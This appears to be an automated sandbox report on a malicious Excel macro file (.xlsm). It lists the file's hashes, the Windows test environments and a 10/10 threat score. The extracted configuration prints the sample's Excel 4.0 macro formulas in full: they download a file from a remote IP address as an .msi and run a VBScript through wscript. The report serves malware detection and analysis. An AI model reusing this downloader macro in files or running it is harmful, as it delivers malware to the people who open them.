General
-
Target
12f2e24bc4d9ff73c0f29d9bd7d8c0d9
-
Size
6KB
-
Sample
231221-2b2vgadahr
-
MD5
12f2e24bc4d9ff73c0f29d9bd7d8c0d9
-
SHA1
ae55ca49e2a8e059f6ebba8f5a7c77383218d3f0
-
SHA256
a22fc0b0fb5c5382f7c47c8af9824353b6e5ad6c99bf71f01dc3e05223cc8ac7
-
SHA512
64668bf8bdda36a73fd5ddea951ac98da1bf01f0382a3401921207529c1d5298f34c01fbc73b34c60404775233a071d24fbaa2a6a8d0e3d3971358bcb40ff05b
-
SSDEEP
192:NDShuSbbrA2OmmfRG8UhHFBFYuAb98yNqxxL+w:NauEM2w01FYxb98y4xH
Static task
static1
Behavioral task
behavioral1
Sample
12f2e24bc4d9ff73c0f29d9bd7d8c0d9.xlsm
Resource
win7-20231215-en
Behavioral task
behavioral2
Sample
12f2e24bc4d9ff73c0f29d9bd7d8c0d9.xlsm
Resource
win10v2004-20231215-en
Malware Config
Extracted
http://46.17.98.187/index.php
http://google.com/index.php
-
formulas
=CALL("Urlmon","URLDownloadToFileA","JJCCJJ",0,"http://46.17.98.187/index.php","C:\~\pes.msi",0,0) =CALL("Urlmon","URLDownloadToFileA","JJCCJJ",0,"http://google.com/index.php","C:\~\pes.msi",0,0) =EXEC("wscript C:\zer\spp.vbs") =HALT()
Extracted
http://46.17.98.187/index.php
http://google.com/index.php
Extracted
http://46.17.98.187/index.php
Targets
-
-
Target
12f2e24bc4d9ff73c0f29d9bd7d8c0d9
-
Size
6KB
-
MD5
12f2e24bc4d9ff73c0f29d9bd7d8c0d9
-
SHA1
ae55ca49e2a8e059f6ebba8f5a7c77383218d3f0
-
SHA256
a22fc0b0fb5c5382f7c47c8af9824353b6e5ad6c99bf71f01dc3e05223cc8ac7
-
SHA512
64668bf8bdda36a73fd5ddea951ac98da1bf01f0382a3401921207529c1d5298f34c01fbc73b34c60404775233a071d24fbaa2a6a8d0e3d3971358bcb40ff05b
-
SSDEEP
192:NDShuSbbrA2OmmfRG8UhHFBFYuAb98yNqxxL+w:NauEM2w01FYxb98y4xH
Score10/10-
Process spawned unexpected child process
This typically indicates the parent process was compromised via an exploit or macro.
-